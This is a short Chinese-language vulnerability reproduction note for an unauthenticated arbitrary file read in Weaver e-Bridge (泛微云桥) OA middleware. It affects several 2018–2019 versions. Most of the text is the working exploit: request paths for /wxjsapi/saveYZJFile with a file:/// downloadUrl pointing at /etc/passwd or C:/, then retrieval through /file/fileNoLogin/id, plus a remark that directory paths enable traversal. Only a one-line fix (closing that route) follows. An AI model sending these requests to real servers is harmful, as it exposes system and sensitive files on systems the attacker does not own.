泛微OA云桥未授权任意文件读取
一、漏洞描述
泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
二、漏洞影响版本
2018-2019 多个版本。
三、漏洞复现
第一步:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,在返回包有id字符串
第二步:通过id值获取文件内容(/file/fileNoLogin/id)
1、使用/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,发现返回提示不存在文件或目录,通过linux对大小写敏感,判断目标使用了linux系统
2、使用/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt,发现返回包中带有id
3、通过查看文件接口访问 /file/fileNoLogin/id
4、downloadUrl参数填写目录的绝对路径时,可以造成目录遍历
四、漏洞修复建议
关闭程序路由 /file/fileNoLogin